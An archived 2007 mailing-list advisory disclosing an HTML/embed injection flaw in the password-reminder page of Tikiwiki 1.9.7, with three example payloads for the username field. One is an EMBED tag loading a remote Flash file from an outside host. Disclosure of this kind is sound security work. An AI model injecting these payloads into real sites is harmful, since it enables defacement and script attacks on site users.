Tikiwiki 1.9.7 HTML/embed object injection
- From: morin.josh@xxxxxxxxx
- Date: 24 Aug 2007 06:57:59 -0000
Tikiwiki
Version: 1.9.7
Example Address
http://example.com/tiki-remind_password.php
Overview:
The following codes can be added to the HTML password page by placing the HTML codes in the user name input box and hitting the "send me my password" button.
Examples:
1.<br><br><b><u>XSS</u></b>
2.<EMBED SRC="http://site.com/xss.swf";
3.<html><fontcolor="Red"><b>Pwned</b></font></html>
- Prev by Date: Re: VMWare poor guest isolation design
- Next by Date: RE: VMWare poor guest isolation design
- Previous by thread: The Korean Hacking & Security Conference "POC 2007" call for papers
- Next by thread: 24th Chaos Communication Congress 2007: Call for Participation
- Index(es):
